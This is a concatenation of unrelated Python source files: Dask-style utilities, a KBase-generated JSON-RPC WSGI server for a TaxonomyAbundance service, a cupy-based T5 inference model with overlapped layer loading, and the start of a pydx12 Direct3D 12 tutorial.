if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin")
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
def clean_dashboard_address(addr, default_listen_ip=""):
"""
Examples
--------
>>> clean_dashboard_address(8787)
{'address': '', 'port': 8787}
>>> clean_dashboard_address(":8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("foo:8787")
{'address': 'foo', 'port': 8787}
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
return {"address": host, "port": port}
|
TaxonomyAbundanceServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from TaxonomyAbundance.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'TaxonomyAbundance'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from TaxonomyAbundance.TaxonomyAbundanceImpl import TaxonomyAbundance # noqa @IgnorePep8
impl_TaxonomyAbundance = TaxonomyAbundance(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'TaxonomyAbundance'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_TaxonomyAbundance.run_TaxonomyAbundance,
name='TaxonomyAbundance.run_TaxonomyAbundance',
types=[dict])
self.method_authentication['TaxonomyAbundance.run_TaxonomyAbundance'] = 'required' # noqa
self.rpc_service.add(impl_TaxonomyAbundance.status,
name='TaxonomyAbundance.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'TaxonomyAbundance ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
model.py
|
import threading
from typing import Callable, Generator, List, Union
import cupy
from ..seq2seq import Seq2SeqModel
from ...layers.transformer_block import TransformerBlockDecoder, TransformerBlockEncoder
from ...layers.encoder_kv import EncoderKeyValueProjection
from ...layers.position_bias import PositionBias
from ...layers.embedding import Embedding
from ...layers.layer_norm import LayerNorm
from ...layers.mask import InputMask
from ...layers.lm_head import LMHead
from ...layers.layer_list import LayerList
from .config import T5Configuration
from .tokenizer import T5Tokenizer
from .context import T5InferenceContext
from ...allocator import ReusedAllocator, SizeLimitedAllocator
import numpy as np
import logging
from ... import data
from ...utils import round_up
logger = logging.getLogger(__name__)
class T5(Seq2SeqModel):
def __init__(self, config : T5Configuration):
# Build Model
logger.info("Building model")
self.memory_overlap = config.MEMORY_OVERLAP
self.max_overlap_layers = max(config.NUM_ENCODER_LAYERS, config.NUM_DECODER_LAYERS)
if self.memory_overlap:
self.overlap_layers = min(config.OVERLAP_LAYERS, self.max_overlap_layers)
else:
self.overlap_layers = self.max_overlap_layers
self.encoder_only = config.ENCODER_ONLY
self.max_decoder_length = config.MAX_DECODER_LENGTH
self.dim_model = config.DIM_MODEL
logger.info("============ T5 ==============")
logger.info("MEM_OVERLAP: %s", self.memory_overlap)
logger.info("OVERLAP_LAYERS: %s", self.overlap_layers)
logger.info("ENCODER_ONLY: %s", self.encoder_only)
logger.info("MAX_DECODER_LENGTH: %s", self.max_decoder_length)
self.input_embedding = Embedding(config.VOCAB_SIZE, config.DIM_MODEL)
self.input_mask = InputMask(is_decoder=False)
self.encoder_position_bias = PositionBias(config.NUM_POSITION_BUCKETS, config.NUM_HEADS, is_decoder=False)
self.num_encoder = config.NUM_ENCODER_LAYERS
self.encoder = LayerList([
TransformerBlockEncoder(config.DIM_MODEL, config.DIM_FF, config.DIM_KV, config.NUM_HEADS)
for _ in range(config.NUM_ENCODER_LAYERS)
])
self.encoder_final_layer_nrom = LayerNorm(config.DIM_MODEL)
self.num_heads = config.NUM_HEADS
self.dim_qkv = config.DIM_KV
if not self.encoder_only:
self.decoder_position_bias = PositionBias(config.NUM_POSITION_BUCKETS, config.NUM_HEADS, is_decoder=True)
self.encoder_kv = EncoderKeyValueProjection(config.NUM_DECODER_LAYERS, config.DIM_MODEL, config.DIM_KV, config.NUM_HEADS)
self.lm_head = LMHead(config.VOCAB_SIZE, config.DIM_MODEL)
self.num_decoder = config.NUM_DECODER_LAYERS
self.decoder = LayerList([
TransformerBlockDecoder(config.DIM_MODEL, config.DIM_FF, config.DIM_KV, config.NUM_HEADS)
for _ in range(config.NUM_DECODER_LAYERS)
])
self.decoder_final_layer_nrom = LayerNorm(config.DIM_MODEL)
if config.MODEL_NAME is not None:
# init parameter
model_path = data.ensure_file(config.MODEL_NAME, "checkpoint.pt")
vocab_path = data.ensure_file(config.MODEL_NAME, "vocab.txt")
self.tokenizer = T5Tokenizer(vocab_path)
self.device = config.DEVICE
with self.device:
logger.info("Start loading parameters from disk to cpu")
self.load( open(model_path, "rb") )
logger.info("Start loading parameters from cpu to gpu")
load_stream = cupy.cuda.Stream()
if self.memory_overlap:
mx_size = 0
for i in range(config.NUM_ENCODER_LAYERS):
mx_size = max(self.encoder[i].nbytes, mx_size)
for i in range(config.NUM_DECODER_LAYERS):
mx_size = max(self.decoder[i].nbytes, mx_size)
if self.overlap_layers >= self.max_overlap_layers:
overlap_size = mx_size * self.max_overlap_layers * 2
elif self.overlap_layers * 2 >= self.max_overlap_layers:
overlap_size = mx_size * self.overlap_layers * 2 + (self.max_overlap_layers - self.overlap_layers) * mx_size
elif self.overlap_layers * 3 >= self.max_overlap_layers:
overlap_size = mx_size * self.overlap_layers * 3 + (self.max_overlap_layers - self.overlap_layers * 2) * mx_size
else:
overlap_size = mx_size * self.overlap_layers * 4
other_size = self.nbytes - self.encoder.nbytes - self.decoder.nbytes
logger.info("Using overlap loader: overlap_size %d, other_size: %d, dynamic_memory %d, memory_limit %d", overlap_size, other_size, config.DYNAMIC_MEMORY, config.MEMORY_LIMIT)
if overlap_size + other_size + config.DYNAMIC_MEMORY > config.MEMORY_LIMIT:
raise ValueError("memory limit not enough, at least %d bytes, but got %d bytes" % (overlap_size + other_size + config.DYNAMIC_MEMORY, config.MEMORY_LIMIT))
self.parameter_allocator = ReusedAllocator(other_size + (mx_size * self.overlap_layers * 2))
if self.overlap_layers >= self.max_overlap_layers:
self.overlap_allocator = [None, None]
elif self.overlap_layers * 2 >= self.max_overlap_layers:
self.overlap_allocator = [None, ReusedAllocator( (self.max_overlap_layers - self.overlap_layers) * mx_size )]
elif self.overlap_layers * 3 >= self.max_overlap_layers:
self.overlap_allocator = [ReusedAllocator( (self.max_overlap_layers - self.overlap_layers * 2) * mx_size ), ReusedAllocator( self.overlap_layers * mx_size )]
else:
self.overlap_allocator = [ReusedAllocator( self.overlap_layers * mx_size ), ReusedAllocator( self.overlap_layers * mx_size )]
self.overlap_allocator_status = [None, None]
self.variable_allocator = SizeLimitedAllocator(config.MEMORY_LIMIT - other_size - overlap_size)
for name, layer in self._sub_layers.items():
if name in ["encoder", "decoder"]:
# move first overlap_size layers to device
for i in range(min(self.overlap_layers, len(layer))):
layer[i].to_device( self.parameter_allocator, load_stream )
else:
layer.to_device( self.parameter_allocator, load_stream )
else:
if self.nbytes + config.DYNAMIC_MEMORY > config.MEMORY_LIMIT:
raise ValueError("memory limit not enough, at least %d bytes, but got %d bytes" % (self.nbytes + config.DYNAMIC_MEMORY, config.MEMORY_LIMIT))
logger.info("Using static loader: total: %d, dynamic_memory %d, memory_limit %d", self.nbytes, config.DYNAMIC_MEMORY, config.MEMORY_LIMIT)
self.parameter_allocator = ReusedAllocator(self.nbytes)
self.variable_allocator = SizeLimitedAllocator(config.MEMORY_LIMIT - self.nbytes)
self.to_device(self.parameter_allocator, load_stream)
self.device.synchronize()
self.load_stream = cupy.cuda.Stream(non_blocking=True)
self.calc_stream = cupy.cuda.Stream(non_blocking=True)
with self.calc_stream:
self.variable_allocator.alloc(config.DYNAMIC_MEMORY) # preallocate
self.device.synchronize()
logger.info("Cleaning useless parameters on cpu")
if self.memory_overlap:
for name, layer in self._sub_layers.items():
if name in ["encoder", "decoder"]:
# move first overlap_size layers to device
pass
else:
layer._remove_data()
for i in range(self.max_overlap_layers):
if i < self.overlap_layers:
self.encoder[i]._remove_data()
self.decoder[i]._remove_data()
else:
if i < self.num_encoder:
self.encoder[i]._try_pinned()
if i < self.num_decoder:
self.decoder[i]._try_pinned()
else:
self._remove_data()
logger.info("End of model initialization")
def encode_loader(self, barrier, load_stream):
with self.device:
for i in range(self.num_encoder):
if i % self.overlap_layers == 0:
load_stream.synchronize()
barrier.wait()
# sync here
if i + self.overlap_layers < self.num_encoder:
overlap_idx = ((i + self.overlap_layers) // self.overlap_layers) % 2
if self.overlap_allocator_status[overlap_idx] == i + 1:
continue
else:
olp_allocator = self.overlap_allocator[overlap_idx]
olp_allocator.reset()
for j in range(i + self.overlap_layers, min(i + self.overlap_layers * 2, self.num_encoder)):
logger.info("Load encoder layer %d", j)
self.encoder[j].to_device(olp_allocator, load_stream)
self.overlap_allocator_status[overlap_idx] = i + 1
def decode_loader(self, barrier, load_stream):
with self.device:
for i in range(self.num_decoder):
if i % self.overlap_layers == 0:
load_stream.synchronize()
barrier.wait()
# sync here
if i + self.overlap_layers < self.num_decoder:
overlap_idx = ((i + self.overlap_layers) // self.overlap_layers) % 2
if self.overlap_allocator_status[overlap_idx] == -(i + 1):
continue
else:
olp_allocator = self.overlap_allocator[overlap_idx]
olp_allocator.reset()
for j in range(i + self.overlap_layers, min(i + self.overlap_layers * 2, self.num_decoder)):
logger.info("Load decoder layer %d", j)
self.decoder[j].to_device(olp_allocator, load_stream)
self.overlap_allocator_status[overlap_idx] = -(i + 1)
def encode(self, input_idx : np.ndarray, input_length : List[int]):
barrier = threading.Barrier(2)
load_thread = threading.Thread(target=self.encode_loader, args=(barrier, self.load_stream), daemon=True)
load_thread.start()
with self.device:
calc_stream = self.calc_stream
batch_size, seq_len = input_idx.shape
if seq_len % 16 != 0:
nw_seq_len = round_up(seq_len, 16) # round up
nw_input_idx = np.zeros((batch_size, nw_seq_len), dtype=np.int64)
nw_input_idx[:, :seq_len] = input_idx
seq_len = nw_seq_len
input_idx = nw_input_idx
del nw_seq_len
del nw_input_idx
with calc_stream:
x = self.input_embedding.forward(self.variable_allocator, input_idx)
encoder_attn_mask = self.input_mask.forward(self.variable_allocator, input_length, seq_len)
x = x.transpose((0, 2, 1))
assert x.dtype == cupy.float16
x_pos = self.encoder_position_bias.forward(self.variable_allocator, seq_len, seq_len)
assert x_pos.shape == (1, self.num_heads, seq_len, seq_len)
assert x_pos.dtype == cupy.float16
for i in range(self.num_encoder):
if i % self.overlap_layers == 0:
calc_stream.synchronize()
barrier.wait()
barrier.reset()
# sync
logger.info("Calc encoder layer %d", i)
with calc_stream:
x = self.encoder[i].forward(
self.variable_allocator,
x,
encoder_attn_mask,
x_pos,
True
)
with calc_stream:
x = self.encoder_final_layer_nrom.forward(self.variable_allocator, x)
calc_stream.synchronize()
load_thread.join()
return T5InferenceContext(x, input_length) # (batch, dim_model, seq_len)
def _init_decoder_context(self, ctx : T5InferenceContext):
hidden_state = ctx.hidden_states
input_length = ctx.input_length
if self.encoder_only:
raise ValueError("T5-encoder only")
with self.device:
with self.calc_stream:
batch_size, _, seq_ipt_len = hidden_state.shape
# (batch, num_decoder, 2, num_heads, dim_kv, seq_ipt_len),
encoder_layers_kv = self.encoder_kv.forward(self.variable_allocator, hidden_state)
# (1, num_heads, max_decoder_length, max_decoder_length)
dec_pos = self.decoder_position_bias.forward(
self.variable_allocator,
self.max_decoder_length,
self.max_decoder_length
)
past_kv = self.variable_allocator.alloc_array((self.num_decoder, batch_size, 2, self.num_heads, self.dim_qkv, self.max_decoder_length), dtype=cupy.float32)
past_kv[:] = 0
encoder_mask = self.input_mask.forward(self.variable_allocator, input_length, seq_ipt_len)[:, :, 0]
ctx.encoder_layers_kv = encoder_layers_kv
ctx.decoder_position_bias = dec_pos
ctx.past_kv = past_kv
ctx.encoder_mask = encoder_mask
ctx.step_pos = 0
def decode_step(self,
ctx : T5InferenceContext,
inputs : Union[List[int], np.ndarray]
) -> cupy.ndarray:
past_kv = ctx.past_kv
encoder_layers_kv = ctx.encoder_layers_kv
dec_position_bias = ctx.decoder_position_bias
encoder_mask = ctx.encoder_mask
step_input = inputs
step_pos = ctx.step_pos
ctx.step_pos += 1
barrier = threading.Barrier(2)
load_thread = threading.Thread(target=self.decode_loader, args=(barrier, self.load_stream), daemon=True)
load_thread.start()
with self.device:
calc_stream = self.calc_stream
with calc_stream:
x = self.input_embedding.forward(self.variable_allocator, step_input) # (batch, dim_model)
for i in range(self.num_decoder):
if i % self.overlap_layers == 0:
calc_stream.synchronize()
barrier.wait()
barrier.reset()
# sync
logger.info("Calc decoder layer %d", i)
with calc_stream:
x = self.decoder[i].forward(
self.variable_allocator,
x, # (batch, dim_model)
past_kv[i], # (batch, 2, num_heads, dim_kv, max_decoder_length)
step_pos, # 1
encoder_mask, # (batch, seq_ipt_len)
encoder_layers_kv[:, i], # (batch, 2, num_heads, dim_kv, seq_ipt_len)
dec_position_bias, # (1, num_heads, max_decoder_length, max_decoder_length)
True
)
with calc_stream:
x = self.decoder_final_layer_nrom.forward(self.variable_allocator, x[:, :, cupy.newaxis])[:, :, 0]
x = self.lm_head.forward(self.variable_allocator, x)
calc_stream.synchronize()
load_thread.join()
return x
def _text_to_id(self, sentence):
return self.tokenizer.encode(sentence)
def _id_to_text(self, idx : List[int]):
return self.tokenizer.decode(idx)
def _get_token_id(self, token, use_unk):
token = token.translate(self.tokenizer.translator_enc)
if use_unk:
return self.tokenizer.encoder.get(token, self.tokenizer.unk_id)
else:
return self.tokenizer.encoder.get(token, None)
def _get_id_token(self, idx):
return self.tokenizer.decoder[idx].translate(self.tokenizer.translator_dec)
|
tutorial016.py
|
import time
from pydx12 import *
from utils import get_best_adapter, enable_debug, print_debug, setup_debug, Barrier, Rasterizer, Mesh, GLTF, ResourceBuffer
from PIL import Image
import gc
import sys
import time
import random
import numpy
import threading
from queue import Queue
from pyrr import matrix44
import struct
import math
enable_debug()
device = D3D12CreateDevice(get_best_adapter())
print(device)
setup_debug(device)
print('DEBUG SET')
window = Window('pydx12: Tutorial 015 (Tessellation)', 1024, 1024)
print(window)
command_queue_desc = D3D12_COMMAND_QUEUE_DESC(
Type=D3D12_COMMAND_LIST_TYPE_DIRECT)
queue = device.CreateCommandQueue(command_queue_desc)
swap_chain_desc1 = DXGI_SWAP_CHAIN_DESC1(Format=DXGI_FORMAT_R8G8B8A8_UNORM, BufferUsage=DXGI_USAGE_RENDER_TARGET_OUTPUT,
BufferCount=2, Scaling=DXGI_SCALING_STRETCH, SwapEffect=DXGI_SWAP_EFFECT_FLIP_DISCARD)
swap_chain_desc1.SampleDesc.Count = 1
swap_chain = CreateDXGIFactory2().CreateSwapChainForHwnd(
queue, window, swap_chain_desc1)
